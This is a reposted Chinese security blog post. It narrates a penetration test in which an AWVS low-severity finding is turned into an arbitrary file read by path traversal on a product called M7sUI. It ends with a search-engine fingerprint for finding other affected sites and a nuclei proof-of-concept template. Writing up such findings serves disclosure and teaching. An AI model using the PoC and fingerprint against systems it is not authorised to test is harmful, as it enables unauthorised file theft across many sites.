从AWVS低危到通杀任意文件读取

admin 2024年8月5日00:17:32评论26 views字数 712阅读2分22秒阅读模式
1
Start
周五临下班了,来活了,要给网站做个渗透测试

从AWVS低危到通杀任意文件读取
周末做个渗透测试,下周一把报告给我。
收到
从AWVS低危到通杀任意文件读取
已经严重影响到斯某人的快乐周末了
2
Action
回家设置一个AWVS任务先扫一下看看情况。浏览一下扫描结果,都是一些不痛不痒的东西

从AWVS低危到通杀任意文件读取

逐个看看各事件的详细信息,目光锁定在了一个数据包上,低危三十年的直觉告诉我,这里有戏。

从AWVS低危到通杀任意文件读取

把数据包粘贴到yakit,测试一下这个file参数,由于之前对这个ip地址做过端口扫描,知道它开放了3389端口,那么很显然他就是一台windows机器,所以直接测试win.ini文件

从AWVS低危到通杀任意文件读取

没读成功,通过响应可以知道,当前是在log目录下的,那试试../来目录穿越一下,一不小心就成了

从AWVS低危到通杀任意文件读取

一个任意文件读取到手,可以直接下班写报告了

到这就结束了?nonono!强烈的第六感告诉我,这是一个通用站点,尝试从hunter上搜一搜指纹

web.body="static/js/chunk-libs.9540f991.js"

这不就来了嘛

从AWVS低危到通杀任意文件读取

由于搭建的网站的不同,linux网站需要用/etc/passwd来进行测试

从AWVS低危到通杀任意文件读取

下面附上nuclei的poc

id: M7sUI-fileread

info:  name: M7sUI任意文件读取  author: 斯叔  severity: highrequests:  - method: GET    path:      - '{{BaseURL}}/api/logrotate/open?file='    matchers-condition: and    matchers:      - type: word        part: body        words:          - 'log'      - type: status        status:          - 200
3
End

原文始发于微信公众号(跟着斯叔唠安全):从AWVS低危到通杀任意文件读取

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月5日00:17:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从AWVS低危到通杀任意文件读取https://cn-sec.com/archives/3034865.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息